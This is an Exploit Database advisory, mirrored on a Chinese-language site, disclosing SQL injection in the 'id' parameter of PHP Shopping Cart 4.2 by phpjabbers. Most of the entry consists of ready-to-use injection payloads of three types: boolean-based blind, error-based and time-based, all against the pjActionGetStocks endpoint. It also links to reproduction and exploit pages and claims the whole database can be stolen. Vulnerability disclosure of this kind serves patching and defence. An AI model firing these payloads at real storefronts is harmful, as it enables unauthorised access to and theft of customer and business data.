PHP Shopping Cart 4.2 – Multiple-SQLi

• Exploit Database
• 17 阅读

• 作者： nu11secur1ty
  日期： 2024-01-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51754/

• ## Title: PHP Shopping Cart-4.2 Multiple-SQLi
  ## Author: nu11secur1ty
  ## Date: 09/13/2023
  ## Vendor: https://www.phpjabbers.com/
  ## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
  ## Reference: https://portswigger.net/web-security/sql-injection
  
  ## Description:
  The `id` parameter appears to be vulnerable to SQL injection attacks.
  A single quote was submitted in the id parameter, and a database error
  message was returned. Two single quotes were then submitted and the
  error message disappeared. The attacker easily can steal all
  information from the database of this web application!
  WARNING! All of you: Be careful what you buy! This will be your responsibility!
  
  [+]Payload:
  mysql
  
  Parameter: id (GET)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
  Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
  3795=3795-- sRcp&session_id=
  
  Type: error-based
  Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
  GROUP BY clause (GTID_SUBSET)
  Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
  GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
  (ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
  (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=
  
  ## Reproduce:
  https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2
  
  ## Proof and Exploit:
  https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html
  
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  nu11secur1ty <http://nu11secur1ty.com/>